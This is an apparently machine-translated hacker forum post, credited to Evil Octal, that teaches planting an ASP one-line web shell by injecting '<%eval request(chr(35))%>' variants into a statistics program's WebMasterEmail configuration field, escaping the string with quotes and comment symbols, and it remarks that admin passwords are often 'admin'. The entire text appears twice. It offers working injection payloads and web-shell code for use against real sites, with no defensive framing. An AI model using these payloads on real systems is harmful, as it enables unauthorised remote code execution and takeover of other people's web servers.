Source: Evil Octal Author: 9xiao
Quote a few sentences from the latest eval version of the ocean, the one you want to use here is <%eval request(chr(35))%>,
The code you wrote in the text box of " is to add the code in the html text box generated after the conversion. Do you know what the text box is? If you don't know, go check the html. If you add it this way, you can use your own C-end. If you don't know, use my ready-made "2006c-end example.htm".
The S-side is <%eval(request("#")%> or <%eval request("#")%> or <%eval request(chr(35))%>, etc., or don't use %, let's transform yourself, I won't say much."
I once set up an environment locally. You can't write it wrong in actual operation, otherwise you will regret it without any haste. In the management mailbox, cnhacker@":eval request(chr(35))//Copy it, click to save, and read the content of _inc/
WebMasterEmail = "cnhacker@\":eval request(chr(35))//"Hehe, hehe, hehe! It was successful, the background in the statistical program "escaped into\" so this is used evalrequest(chr(35)) Hehe, // is annotation: in asp it is a line break, the premise is that you can enter the background, (many background management passwords are admin hehe) PHP can also do this, and it is more places than asp to use! You need to move the front and back matching of the configuration statements and make good use of some symbols.
Also note: A similar method is mentioned in the 8th issue of Black Defense. This is posted here. The code in Black Defense can be written as 9xiao"%><%eval request(chr(35))%><%'. This method is also relatively clever. // and ' are comment statements in Asp! This statistical program has some brute-repository and will not be announced!
For php, you can refer to the three methods of getting shell from phpwind backend written by saiy.
Quote a few sentences from the latest eval version of the ocean, the one you want to use here is <%eval request(chr(35))%>,
The code you wrote in the text box of " is to add the code in the html text box generated after the conversion. Do you know what the text box is? If you don't know, go check the html. If you add it this way, you can use your own C-end. If you don't know, use my ready-made "2006c-end example.htm".
The S-side is <%eval(request("#")%> or <%eval request("#")%> or <%eval request(chr(35))%>, etc., or don't use %, let's transform yourself, I won't say much."
I once set up an environment locally. You can't write it wrong in actual operation, otherwise you will regret it without any haste. In the management mailbox, cnhacker@":eval request(chr(35))//Copy it, click to save, and read the content of _inc/
WebMasterEmail = "cnhacker@\":eval request(chr(35))//"Hehe, hehe, hehe! It was successful, the background in the statistical program "escaped into\" so this is used evalrequest(chr(35)) Hehe, // is annotation: in asp it is a line break, the premise is that you can enter the background, (many background management passwords are admin hehe) PHP can also do this, and it is more places than asp to use! You need to move the front and back matching of the configuration statements and make good use of some symbols.
Also note: A similar method is mentioned in the 8th issue of Black Defense. This is posted here. The code in Black Defense can be written as 9xiao"%><%eval request(chr(35))%><%'. This method is also relatively clever. // and ' are comment statements in Asp! This statistical program has some brute-repository and will not be announced!
For php, you can refer to the three methods of getting shell from phpwind backend written by saiy.